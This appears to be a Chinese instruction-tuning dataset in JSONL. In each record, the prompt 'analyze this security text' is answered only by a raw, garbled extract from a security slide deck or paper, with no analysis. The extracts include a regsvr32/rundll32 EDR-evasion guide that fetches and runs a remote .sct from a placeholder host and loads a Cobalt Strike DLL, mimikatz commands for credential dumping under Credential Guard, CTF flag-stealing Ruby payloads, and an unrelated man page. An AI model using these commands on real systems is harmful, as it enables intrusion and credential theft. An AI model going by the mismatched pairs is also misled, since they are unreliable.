{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHITCON GIRLS 的第一個軟體 破解課程 Charles 課程內容  逆向工程與軟體破解概念簡介  Lab 0  軟體破解前你必須知道的二三事  Lab 1  通往破解點的道路  Strings 與 API  Lab 2  軟體破解實戰Demo  010 Editor 逆向工程與軟體破解  何謂逆向工程  從宅仔和小P的愛情故事說 起 逆向工程與軟體破解  何謂逆向工程  宅仔深愛著小 p卻發現自 己聽不懂她說的話 !@#$%&* ()_+ int main(){ printf(I love you\\n!!); } 817C24 08 1101>CMP DWORD PTR SS:[ESP+8],111 75 74 JNZ SHORT ncrackme.004010CE 8B4424 0C MOV EAX,DWORD PTR SS:[ESP+C] 66:3D EA03 CMP AX,3EA 75 42 JNZ SHORT ncrackme.004010A6 E8 C7010000 CALL ncrackme.00401230 85C0 TEST EAX,EAX 逆向工程與軟體破解  何謂逆向工程  痴心的宅仔想更了解小p的 內心世界於是努力學習小p的語言  機器 語言 逆向工程與軟體破解  何謂逆向工程 宅仔成功了他學會了逆向 工程成為了  成功擄獲小p的心 駭客 逆向工程與軟體破解  逆向工程工程師在寫程式時  通常是以高階語言(high level language)作撰寫  再藉由Compiler的幫助將其轉化成電腦所能接 受的機器語言(Machine language)  逆向工程是將一個編譯過的二進位程式檔試 圖重製或了解該程式運作方式的過程  軟體破解藉由逆向工程的手法了解程 式的架構或流程後嘗試對其進行修改 以改變其原始運作方式 (讓它乖乖聽話) 軟體破解實例  序號破解 逆向工程與軟體破解  為什麼我們要學逆向工程  破解軟體保護 (跟朋友炫耀用免錢的程式)  讓沒有原始碼的軟體程式可以二次利用  評估軟體程式品質和健全性 (黑箱測試)  研究病毒和惡意程式 (like Charles )  幫現有程式增加功能 (寫遊戲外掛) 逆向工程與軟體破解  作逆向工程前你必須  寫過簡單程式了解何謂程式架構邏輯判斷 及流程跳轉  碰過一點組合語言  具備耐心與熱忱 逆向工程與軟體破解  逆向工程常用到的工具  除錯器(Debuggers)  16進位編輯器(Hex editors)  PE and resource viewers/editors  System Monitoring tools 課程內容  逆向工程與軟體破解概念簡介  Lab 0  軟體破解前你必須知道的二三事  Lab 1  通往破解點的道路  Strings 與 API  Lab 2  軟體破解實戰Demo  010 Editor Lab 0  用資源編輯器來作我們的第一個程式修改 Lab 0  目的修改出中文的小算盤 Lab 0  用XN Resource Editor打開Lab 0裡面附 的calc.exe [File]  [Open] Lab 0  選擇左方欄String Table, 依次展開尋找想 要修改的項目  找到想要修改的項目後在該欄位上按右 鍵修改 Lab 0  動手時間10 mins 課程內容  逆向工程與軟體破解概念簡介  Lab 0  軟體破解前你必須知道的二三事  Lab 1  通往破解點的道路  Strings 與 API  Lab 2  軟體破解實戰Demo  010 Editor 程式破解前你必須知道的二三事  程式流程跳轉: if-else int main(){ unsigned int age; printf(\"Please enter your age: \"); scanf(\"%d\", &age); printf(\"\\n\"); if(age < 18){ printf(\"I'm sorry, deer cutie, you are not allowed to drink beer :(\\n\"); } else{ printf(\"Let's have a crazy party !! :D\\n\"); } } Action1 Action2 C:\\Documents and Settings\\Administrator\\桌面 \\Hitcon_girls\\Lab>age.exe Please enter your age: 18 Let's have a crazy party !! :D C:\\Documents and Settings\\Administrator\\桌面 \\Hitcon_girls\\L", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 威胁情报与全流量异常检测案例分析 toc: true date: 2020-02-25 01:42:35 tags: [威胁情报, 流量检测] --- # 威胁情报与全流量异常检测案例分析 滴滴出行安全说第七期威胁情报与全流量异常检测案例分析学习笔记 ## 分析APT事件所要具备的能力 ### 流量分析 - 使用协议分析工具独立识别各种通讯协议对异常流量尝试着手动重组还原> Wireshark[源代码](https://github.com/wireshark/wireshark)分析 - 了解常用工具的通讯加密协议具有解包还原的能力 ### 远控软件和指纹 熟悉远控软件和各种攻击类软件的指纹 - 木马指纹 - 部分常见应用漏洞扫描器的指纹e.g. Sqlmap ### 可疑邮件 - 邮件头 - 附带的恶意样本的分析 - 邮件XSS代码的分析 - 邮件恶意Link连接的分析 ### 恶意样本分析 取证分析恶意样本分析 - 脱壳 - 植入反弹域名和各种回传方式的分析 - 自身加密算法的逆向分析 - 对一个木马家族变种的聚类分析 - 对木马控制端的研究 - 对沙箱逃逸技术的检测和分析 - 熟练搭建各种蜜罐系统 ## 安全情报实现威胁检测和响应的闭环 ![威胁检测和响应的闭环](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200225005131.png) 关于安全研究人员 - 挖掘跟踪漏洞分析攻击数据组件识别爬虫输出组件库 - 分析攻击捕获跟踪漏洞并输出研究成果 ## DNS安全检测分析 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200225010047.png) 图模型 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200225010244.png) 图10大检测 - 检测模型 - 10大检测方向 - 分析主机信誉值 ### 流量分析实例 1. 利用structs2-045进行RCE的完整攻击路线挖矿流量 2. 菜刀webshell流量分析攻击路径攻击者行为 3. Linux门罗币挖矿如何绕过杀软隐藏在图片中的shell脚本通过dd分离 4. 国内Windows DDoS客户端案例", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n笔记本 企业安全建设 创建时间 2022/10/2 10:51 更新时间 2022/10/2 13:31 作者 Aim High URL https://www.cnblogs.com/xinxin999/p/15874533.html regsvr32 && rundll32的研究 一.前言 关于在终端对抗上regsvr32 && rundll32师傅们常用的2种方式 regsvr32 /s /u /i:http://xx.xx.xx.xx:6007/test.sct scrobj.dll //执行恶意sct文件 rundll32 cs.dll start //上线cs的dll 师傅们更在意的是自己的sct文件是否免杀cs生成的dll是否免杀但是对于大型企业来讲你的 恶意文件免杀很重要同样你的终端行为也很重要站在regsvr32和rundll32这2个常见的命令 上我们有哪些比较好的思路呢 一些文件 二.基础思路 最最简单的思路就在于对regsvr32.exescrobj.dllrundll32.exe这三个windows自带的文件进 行变形绕过最基础的检测匹配 常见的方法 1copy && rename 我们可以copy regsvr32.exescrobj.dllrundll32.exe这三个文件更改名字进行简单的绕过 copy c:\\windows\\system32\\regsvr32.exe 32regsvr.exe 32regsvr /s /u /i:http://xx.xx.xx.xx:6007/test.sct scrobj.dll rundll32也是同理 (2)通过mklink对于scrobj.dll的变形 通过mklink软链接新dll mklink congya.dll c:\\Windows\\System32\\scrobj.dll regsvr32 /s /u /i:http://xx.xx.xx.xx:6007/test.sct congya.dll 3rundll32中间的空格和逗号 rundll32 calc.dll start rundll32 calc.dll,start 三.一些特别的 当某些EDR对copy renamemklink需要管理员权限等命令进行限制或者CEP关联匹配 我们就需要寻求一些突破 1利用type文件流绕过 type c:\\Windows\\System32\\scrobj.dll > bypass1.txt:test.dll regsvr32 /s /u /i:http://xx.xx.xx.xx:6007/test.sct bypass1.txt:test.dll 此外我们还可以利用makecab替代type执行文件流 makecab c:\\Windows\\System32\\scrobj.dll c:\\Windows\\System32\\scrobj.cab extrac32 c:\\Windows\\System32\\scrobj.cab c:\\users\\congya\\desktop\\abc.txt:abc.dll wmic process call create \"regsvr32 /s /u /i:http://xx.xx.xx.xx:6007/test.sct c:\\users\\congya\\desktop\\abc.txt:abc.dll\" 以及findstr的文件流 echo cba > cba.txt findstr /V /L W3AllLov3DonaldTrump c:\\Windows\\System32\\scrobj.dll > c:\\users\\congya\\desktop\\cba.txt:cba.dll regsvr32 /s /u /i:http://xx.xx.xx.xx:6007/test.sct c:\\users\\congya\\desktop\\cba.txt:cba.dll 2特殊字符 regsvr32 /s /u /i:http://xx/test.sct scrobj.dll regsvr32 /s /u -i:http://xx/test.sct scrobj.dll 四.关于rundll32 (1)执行cpl文件 这部分的细节参考我之前的博客 https://www.cnblogs.com/xinxin999/p/15874533.html (2)执行exe文件 C:\\WINDOWS\\System32\\rundll32 advpack.dll #12 C:\\Users\\xinxin\\Desktop\\ConsoleApplication1.exe //执行exe rundll32 advpack.dll, #-4294967284 C:\\U", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJTAGulator Block Diagram Document rev. 1.0 March 20, 2013 Joe Grand, Grand Idea Studio, Inc. MCU Parallax Propeller EEPROM 24LC512 2 (I2C) Power Switch MIC2025-2YM LDO LD1117S33TR USB 5V 3.3V D/A AD8655 1.2V - 3.3V ~13mV/step Serial-to-USB FT232RL 2 1 (PWM) Host PC USB Mini-B Voltage Level Translator TXS0108EPWR Voltage Level Translator TXS0108EPWR Voltage Level Translator TXS0108EPWR Input Protection Circuitry 24 Target Device 1 Status Indicator WP59EGW", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n实战攻防演习之 蓝队视角下的防御体系构建 1 实战攻防演习之 蓝队视角下的防御体系构建 3 前 言 网络实战攻防演习是新形势下关键信息系统网络 安全保护工作的重要组成部分演习通常是以实际运 行的信息系统为保护目标通过有监督的攻防对抗 最大限度地模拟真实的网络攻击以此来检验信息系 统的实际安全性和运维保障的实际有效性 2016年以来在国家监管机构的有力推动下网 络实战攻防演习日益得到重视演习范围越来越广 演习周期越来越长演习规模越来越大国家有关部 门组织的全国性网络实战攻防演习从2016年仅有几家 参演单位到2019年已扩展到上百家参演单位同时 各省各市各行业的监管机构也都在积极地筹备 和组织各自管辖范围内的实战演习一时间网络实 战攻防演习遍地开花 在演习规模不断扩大的同时攻防双方的技术水平 和对抗能力也在博弈中不断升级 2016年网络实战攻防演习尚处于起步阶段攻 防重点大多集中于互联网入口或内网边界 2017年实战攻防演习开始与重大活动的网络安 全保障工作紧密结合就演习成果来看从互联网侧 实战攻防演习之 蓝队视角下的防御体系构建 4 发起的直接攻击仍然普遍十分有效而系统的外层防 护一旦被突破横向移动跨域攻击往往都比较容 易实现 2018年网络实战攻防演习开始向行业和地方深 入伴随着演习经验的不断丰富和大数据安全技术的 广泛应用防守方对攻击行为的监测发现和溯源能 力大幅增强与之相应的攻击队开始更多地转向精 准攻击和供应链攻击等新型作战策略 2019年以来网络实战攻防演习工作受到了监 管部门政企机构和安全企业的空前重视流量分 析EDR蜜罐白名单等专业监测与防护技术被防 守队广泛采用攻击难度的加大也迫使攻击队全面升 级诸如0day漏洞攻击1day漏洞攻击身份仿冒 钓鱼WiFi鱼叉邮件水坑攻击等高级攻击手法在 实战攻防演练中均已不再罕见攻防演习与网络实战 的水平更加接近 如何更好地参与网络实战攻防演习如何更好地借 助实战攻防演习提升自身的安全能力这已经成为大 型政企机构运营者关心的重要问题 作为国内领先的网络安全企业奇安信集团已成为 全国各类网络实战攻防演习的主力军奇安信集团安 实战攻防演习之 蓝队视角下的防御体系构建 5 服团队结合200余次实战攻防演习经验总结编撰了这 套实战攻防演习系列丛书分别从红队视角蓝队视 角和紫队视角来解读网络实战攻防演习的要领以 及如何结合演习提升政企机构的安全能力 需要说明的是实战攻防演习中的红方与蓝方对抗 实际上是沿用了军事演习的概念和方法一般来说 红方与蓝方分别代表攻击方与防守方不过红方和 蓝方的名词定义尚无严格的规定也有一些实际的攻 防演习将蓝队设为攻击队将红队设为防守队在 本系列丛书中我们依据绝大多数网络安全工作者的 习惯统一将攻击队命名为红队将防守队命名为蓝 队而紫队则代表组织演练的机构 蓝队视角下的防御体系构建是本系列丛书的第 二本本书希望通过归纳总结蓝队防御的三个阶段 应对攻击的常用策略以及建立实战化的安全体系的 基本方法帮助政企机构弥补薄弱环节更好地提升 演习水平构筑更有效的安全防御体系 实战攻防演习之 蓝队视角下的防御体系构建 6 目 录 第一章 什么是蓝队.......................................1 第二章 蓝队三步走防守的三个阶段............4 一备战阶段不打无准备之仗........................4 二实战阶段全面监测及时处置....................6 三战后整顿实战之后的改进........................8 第三章 蓝队应对攻击的常用策略.....................9 一防微杜渐防范被踩点...................................9 二收缩战线收敛攻击面.................................10 三纵深防御立体防渗透.................................12 四守护核心找到关键点.................................14 五洞若观火全方位监控.................................15 实战攻防演习之 蓝队视角下的防御体系构建 7 第四章 建立实战化的安全体系......................17 一认证机制逐步向零信任架构演进..................17 二建立面向实战的纵深防御体系......................19 三强化行之有效的威胁监测手段......................20 四建立闭环的安全运营模式.............................21 附录 奇安信", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHellaphone John Floren Introduction Android Inferno Bibliography Hellaphone: Replacing the Java in Android John Floren Sandia National Labs July 2012 Collaborators: Joshua Landgraf, Joel Armstrong Sandia National Laboratories is a multi-program laboratory managed and operated by Sandia Corporation, a wholly owned subsidiary of Lockheed Martin Corporation, for the U.S. Department of Energys National Nuclear Security Administration under contract DE-AC03-94AL85000. SAND 2012-5278C. Hellaphone John Floren Introduction Android Inferno Bibliography Biography  Computer engineer by training (RIT)  Been interested in operating systems since high school  Work for Sandia National Labs, California  High performance computing  Mobile  Security  I like open source and Sandia is down with that  Goal: open up as much of my work as possible Hellaphone John Floren Introduction Android Inferno Bibliography Smartphones  Totally ruling the world  A computer in my pocket? Awesome!  It can make phone calls too?  Nifty sensors: camera, GPS, accelerometer  Read email, browse the web, take pictures, get driving directions, play games  Manage your passwords, 2 factor auth, Google Wallet Hellaphone John Floren Introduction Android Inferno Bibliography Why smartphones kinda suck  Blackberry, iPhone, Windows: all closed-source  RIM will decrypt your messages for the government [6][5]  iPhone  Tracks your movements [1]  DoS attack via SMS [2]  Windows  Nobody has one!  DoSd via SMS [7]  CarrierIQ [3] Hellaphone John Floren Introduction Android Inferno Bibliography But Android is still cool, right?  Linux-based  Open-source  Tons of devices (phones, tablets, laptops)  Write your own applicationsno developer fees, no market fees!  You can hack the OS if you want  Big community of developers and OS hackers Hellaphone John Floren Introduction Android Inferno Bibliography Android kinda sucks too  I have to program in WHAT?  Vendors have no incentive to update the OS  How much do you trust Joe Randoms", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Private/Local/Comment (PPC, 50+70+100p) ###ENG [PL](#pl-version) Set of three tasks where we can execute some Ruby code to steal the flag. #### Private First task has code: ```ruby require_relative 'restrict' Restrict.set_timeout class Private private public_methods.each do |method| eval \"def #{method.to_s};end\" end def flag return \"TWCTF{CENSORED}\" end end p = Private.new Private = nil input = STDIN.gets fail unless input input.size > 24 && input = input[0, 24] Restrict.seccomp STDOUT.puts eval(input) ``` So we can provide 24 characters and we need to get the value returned by `flag` method. We can't call the method since all methods are now private. To solve it we use a trick - we monkey patch a new method to the instance `p` and from this method we can call also private methods so exploit is: ```ruby def p.x;flag end;p.x ``` #### Local & Comment Attack for both of those was the same. The code for local was ```ruby require_relative 'restrict' Restrict.set_timeout def get_flag(x) flag = \"TWCTF{CENSORED}\" x end input = STDIN.gets fail unless input input.size > 60 && input = input[0, 60] Restrict.seccomp STDOUT.puts get_flag(eval(input)) ``` and for comment was: ```ruby require_relative 'restrict' Restrict.set_timeout input = STDIN.gets fail unless input input.size > 60 && input = input[0, 60] require_relative 'comment_flag' Restrict.seccomp STDOUT.puts eval(input) ``` ```ruby # FLAG is TWCTF{CENSORED} ``` In both cases we searched the heap memory looking for the flag string stored in not-yet garbage collected memory using `ObjectSpace`: For local: ```ruby ObjectSpace.each_object(String){|x|x[3]==\"T\"and print x} ``` And for comment: ```ruby ObjectSpace.each_object(String){|x|x[15]=='{'and print x} ``` ###PL version Zestaw 3 zadań w których możemy wykonać pewien kod Ruby aby ukraść flagę. #### Private Kod do pierwszego zadania: ```ruby require_relative 'restrict' Restrict.set_timeout class Private private public_methods.each do |method| eval \"def #{method.to_s};end", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup CSAW CTF Quals 2016 Team: c7f.m0d3, cr019283, nazywam, rev, msm, akrasuski1, shalom ![](./scoreboard.png) ### Table of contents * [Sleeping guard (Crypto)](sleeping_guard) * [Fuzyll (Recon)](fuzyll) * [Regexpire (Misc/PPC)](regexpire) * [Broken box (Crypto)](broken_box) * [Still broken box (Crypto)](still_broken_box) * [Neo (Crypto)](neo)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\np Chema Alonso Chema Alonso Informática 64 Informática 64 Connection Strings Connection Strings  Define the way an application connects to Define the way an application connects to data repository  There are connection strings for:  There are connection strings for:  Relational Databases (MSSQL, Oracle, MySQL,) LDAP Di i  LDAP Directories  Files  Etc Databases Connection Strings Databases Connection Strings Data Source = myServerAddress; Data Source = myServerAddress; Initial Catalog = myDataBase; Initial Catalog myDataBase; User Id = myUsername; Password = myPassword; Google Hacking Google Hacking Google Hacking Google Hacking UDL (Universal Data Links) Files UDL (Universal Data Links) Files Credentials Credentials Operating System Accounts Database Credentials Operating System Accounts Data Source = myServerAddress; Database Credentials Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = SSPI/True/Yes; Password = myPassword; Integrated Security = No; SSPI/True/Yes; Users autheticated by Web App Web application manages the login process Syslogins Connection string 1. Web applicaton connects using its credentials to the credentials to the database. 2. Asks user login i f ti Custom users table information. 3. Checks login information about info Select id from users stored in custom users table. Database Engine App running on Web Server Users autheticated by Database Database engine manages the login process 1. Web application asks for credentials. 2 i i Syslogins Connection string 2. A connection string is composed with the credentials to connect to the database. 3. Roles and permits are limited by the user sed in the connection used in the connection string Database Engine App running on Web Server Connection String Attacks Connection String Attacks  Its possible to inject parameters into connection It s possible to inject parameters into c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@patrickwardle DEATH BY 1000 INSTALLERS ...it's all broken :( WHOIS leverages the best combination of humans and technology to discover security vulnerabilities in our customers web apps, mobile apps, IoT devices and infrastructure endpoints security for the 21st century @patrickwardle issues; bugs; & exploits! OUTLINE authorization core issues finding 0days bugs exploits (user-assisted) privilege escalation THE GOAL infect trojan email exploits } 1 2 escalate privileges $_ #_ fake popups (lame) vulnerabilities today, we'll focus on finding & exploiting vulnerabilities in installers/updaters that (with user assistance) provide the means for local elevation of privileges. } (not lame) today's talk AUTHORIZATION executing priv'd actions (ui) (low-priv'd) apps may need to perform priv'd actions THE NEED installing updating debugging system conf } most common ...for me, about 1x a day! authentication & authorization BEHIND THE SCENES security agent: show authentication dialog installer: \"I wanna do a priv'd action\" 1 2 3 4 authorization daemon: authorization database XPC XPC priv'd action! more info: \"Authorization Services Programming Guide\" -apple \"*OS Internals v.III\" -levin consult auth db xpc for auth prompt request via AuthorizationExecuteWithPrivileges() BEHIND THE SCENES installer: \"I wanna do a priv'd action\" 1 AuthorizationRef authRef; AuthorizationCreate(NULL, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, &authRef); AuthorizationExecuteWithPrivileges(authRef, \"/path/to/binary\", kAuthorizationFlagDefaults, NULL, NULL); AuthorizationExecuteWithPrivileges() define TRAMPOLINE \"/usr/libexec/ security_authtrampoline\" AuthorizationExecuteWithPrivileges() -> AuthorizationExecuteWithPrivilegesExternalForm() switch (fork()) { //child case 0: execv(trampoline, (char *const*)argv); $ ls -lart /usr/libexec/security_authtrampoline -rws--x--x root wheel security_authtrampoline int main() { AuthorizationItem right = {EXECUTERIGHT, ...}; AuthorizationRights inRi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Open Threat Hunting Framework John Dwyer, X-Force Head of Research (@TactiKoolSec, LinkedIn: john-dwyer-xforce) Neil Wyler, X-Force Global ATA Lead (@Grifter801) Sameer Koranne, X-Force Global OT Lead #BHUSA @BlackHatEvents Information Classification: General Chasing Excellence High Performers Value Maturity Analysis of high performing programs revealed that alignment with a mission was a stronger indicator of value and maturity than technical investment. #BHUSA @BlackHatEvents Information Classification: General You cannot look in a new direction by looking harder in the same direction. #BHUSA @BlackHatEvents Information Classification: General Open Threat Hunting Framework Foundational Structure Operational Measurement Maturity Communication Continuous Improvement Preparation Modules Framework Lab Env Foundational Structural Preparation Lab Env Operational Measurement Communication Maturity #BHUSA @BlackHatEvents Information Classification: General Open Threat Hunting Framework Continuous Improvement Foundational Structural Preparation Lab Env Operational Measurement Communication Maturity #BHUSA @BlackHatEvents Information Classification: General 6 Assessment Development Implement Capture Ideas Ideas Ideas Ideas Ideas Ideas Great ideas are a dime a dozen. Its the drive and execution to make those ideas something real that is rare #BHUSA @BlackHatEvents Information Classification: General Backup/Dev", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass Credential Guard 0x01 Credential Guard 1 Windows Defender Credential Guard (WDCG) Windows 10 WDCG LSASS (LSAISO) , (trusted) administrator / System LSASS/LSAISO WDCG NTLM Kerberos (Kerberos derived credentials) (domain credentials) Credential Guard lsass 2LSALSAVSM 2 Gredential Guard Microsoft Powershell TPM -1.2 2.0 UEFI - 64 CPU CPU Windows Hyper-v Windows gpedit.msc) Windows Defender \"\" ->  ->  -> Device Guard \"\" \"\"; \"\" \"DMA\" \"UEFI\" Credential Guard \"\" Windows System ID 1415 LSA LsaIso.exe mimikatz gpupdate /force 1 Gredential Guard 0x02 Bypass Credential Guard 1Dump SAM CG ( Credential Guard ) SAM CG 2SSP SSP lsass.exe Microsoft Mimikatz ssplsasslsass c:\\windows\\system32\\ mimilsa.log mimikatz # privilege::debug mimikatz # token::elevate mimikatz # lsadump::sam 1 2 3 mimikatz # privilege::debug mimikatz # misc::memssp 1 2 3NetNTLM Downgrade Attack NetNTLM NetNTLMv1NetNTLMv2v1 v2 Windows NetNTLMv1 NTLM SSP NetNTLMv1 & Usage 0x03 https://docs.microsoft.com/zh-cn/windows/security/identity-protection/credential-guard/credenti al-guard-requirements https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credenti al-guard-manage https://docs.microsoft.com/zh-cn/windows/security/identity-protection/remote-credential-guard https://blog.stealthbits.com/defender-credential-guard-protecting-your-hashes/ https://www.microsoft.com/en-us/download/details.aspx?id=53337 https://github.com/eladshamir/Internal-Monologue 1 Internal-Monologue.exe 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n你也配用计划任务 高级攻防实验室 老草 前言 标题微软雅黑20号字 01 PART 前言  这是一篇老草的自我反思  核心技术点TaskScheduler(Windows)  关联知识点RPC/IDL/COM/UAC/横向移动/武器化  请勿对号入座 你也配用计划任务API 标题微软雅黑20号字 02 PART 你也配用计划任务API  正常的计划任务用法  抄自msdn  按顺序十个以上必要调用 你也配用计划任务API  本质呢 你也配用计划任务API  抓个包 你也配用计划任务API  理论依据呢  MS-TSCH 你也配用计划任务API  披着COM/DCOM皮的纯RPC  本地对象/帮助类 ITaskService/ITaskFolder/IAction/ITrigger  底层协议SchRpc  看到及用到的都是假的 你也配用计划任务API  COM简单用法 你也配用计划任务API  原生RPC 你也配用计划任务API  事情的本质就是这么简单  那你之前都做了啥  天天用impacket就是不去看源码 你也配过UAC 标题微软雅黑20号字 03 PART 你也配过UAC  思考为什么微软引入计划任务COM对象  RPC函数约定式调用C  COM面向对象C++ 你也配过UAC  COM基础  CLSID 你也配过UAC  COM基础  代理模式 你也配过UAC  哪里还有计划任务 你也配过UAC  如何调用 COM Proxy Object 你也配过UAC  From Elevated COM Proxy To UAC Bypass  你也配过UAC  And Get SYSTEM Directly ! 你也配玩横向移动 标题微软雅黑20号字 04 PART 你也配玩横向移动  2202年了横移回显还要目标共享  除了文件/注册表有没有更直接的方式 你也配玩横向移动  天天反序列化Gadget就不会举一反三  创建远程计划任务执行命令  PowerShell/VBS/CSC操作本地计划任务  本地客户端查询任务信息获取回显 你也配玩横向移动  计划任务协议通信/RPC端口复用伪 你也配玩横向移动  计划任务协议通信/RPC端口复用伪 你也配玩横向移动  原生通信加密 你也配玩横向移动  白名单进程链/无上下文 你也配做武器化 标题微软雅黑20号字 05 PART 你也配做武器化  脱离实战照本宣科抄代码做武器 你也配做武器化  优化XML 你也配做武器化  RPC流量加密了吗 你也配做武器化  还在用vs生成的Interop?  MSDN COM Interop  C++虚函数表 你也配做武器化  举一反三  结合Part3/Part4进行UAC回显 配钥匙吗 标题微软雅黑20号字 06 PART 配钥匙吗  我们真的达到武器化标准了吗  我们真的吃透每一个技术细节了吗  传统的技术真的无需研究了吗 配钥匙吗  Windows没研究明白就开始看不起COM/RPC  能分清COM和RPC吗  能分清协议层的DCOM和RPC吗  能分清进程外COM对象远程DCOM与COM外部代理模式吗 配钥匙吗  天天搞语言之争  你是专业开发吗  leetcode hard刷全了吗  二十几种设计模式用对了吗 配钥匙吗  天天追热点炒冷饭  我复现===我会了  官方文档看过了吗  文档写明的特性研究了吗 配钥匙吗  还在跪舔洋大人  你家洋大人是这么写的 配钥匙吗  还在跪舔洋大人  你家洋大人每个技术都有配套的检测方式/Yara规则甚至防御方案  但是你没看  你还在抄代码 配钥匙吗  还在跪舔洋大人  你家洋大人甚至背后站着白头鹰  技术没国界你有国籍 总结 标题微软雅黑20号字 07 PART THANKS", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n{Anthony Lai, Benson Wu, Jeremy Chiu}, Founder and Security Researcher, Xecure Lab anthony.lai@xecure-lab.com benson.wu@xecure-lab.com jeremy.chiu@xecure-lab.com http://blog.xecure-lab.com Chroot Security Group http://www.chroot.org/  CHROOT 成立於西元2004年是台灣一群專 業優質又玉樹臨風的好孩子組成的 (會員招募中目前團報另有優惠) Xecure Lab Team  Yes! We are all the good guys  Birdman Benson DarkFloyd http://blog.xecure-lab.com Bio  Jeremy Chiu (aka Birdman)  He has more than ten years of experience with host-based security, focusing on kernel technologies for both the Win32 and Linux platforms. In early 2001 he was created Taiwan's first widespread trojan BirdSPY. And now, he is also a contract trainer for law enforcements, intelligence organizations, and conferences such as DEFCON 18, SySCAN (09 08), Hacks in Taiwan (07 06 05), HTICA(06 08) and OWASP Asia (08 07). Jeremy specializes in rootkit/backdoor design. Jeremy also specializes in reverse engineering and malware analysis, and has been contracted by law enforcements to assist in forensics operations. Jeremy is a sought-after speaker for topics related to security, kernel programming, and object-oriented design  Benson Wu  He currently works as Postdoctoral Researcher from Research Center for Information Technology Innovation at Academia Sinica in Taiwan. He focuses research on malware and threat analysis, code review, secure coding and SDLC process implementation. He graduated from National Taiwan University with PhD degree in Electrical Engineering. He had spoken at NIST SATE 2009, DEFCON 18 (with Birdman), OWASP China 2010, and wrote the \"Web Application Security Guideline\" for the Taiwan government.  Anothny Lai ( aka DarkFlyod )  He works on code audit, penetration test, crime investigation and threat analysis and acted as security consultant in various MNCs. His interest falls on studying exploit, reverse engineering, analyse threat and join CTFs, it would be nice to keep going and boost this China-made security wind in malware analysis and adv", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Logarithms are hard (misc, 10p) ## ENG [PL](#pl-version) ``` What is e(1.000000001)? Please enter in decimal with 7 places. (For example, if the answer was 2.71828183... the flag would be 2.7182818 ) ``` As in previous editions of Plaid CTF we have a misc task regarding some bug in numerical computation. This time it is calculation is exponent function. Quick googling gets us to: http://www.datamath.org/Story/LogarithmBug.htm which says that some calculators would get the result wrong and instead of `2.7182818` give `2.7191928`. We submit the latter as a flag and get 10 points. ## PL version ``` What is e(1.000000001)? Please enter in decimal with 7 places. (For example, if the answer was 2.71828183... the flag would be 2.7182818 ) ``` Tak jak w poprzednich edycjach Plajd CTF mamy zadanie związane z błędami w obliczeniach numerycznych. W tym przypadku chodzi o eksponente. Szybkie googlowanie pozwala nam trafić na http://www.datamath.org/Story/LogarithmBug.htm gdzie możemy wyczytać, że niektóre kalkulatory zamiast `2.7182818` dawały wynik `2.7191928`. Wysyłamy niepoprawną wartość jako flagę i dostajemy 10p.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH FALSE 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 false \\- 失败地什么都不做 .SH 概述 \\fBfalse\\fP [\\fI\\,忽略命令行参数\\/\\fP] .br \\fBfalse\\fP \\fI\\,选项\\/\\fP .SH 描述 .\\\" Add any additional description here .PP 以表示失败的状态值退出 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .PP 注意您的 shell 可能内置了自己的 false 程序版本它会覆盖这里所提及的相应版本请查阅您的 shell 文档获知它所支持的选项 .SH 作者 由 Jim Meyering 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 完整文档请见 <https://www.gnu.org/software/coreutils/false> .br 或者在本地使用 info \\(aq(coreutils) false invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
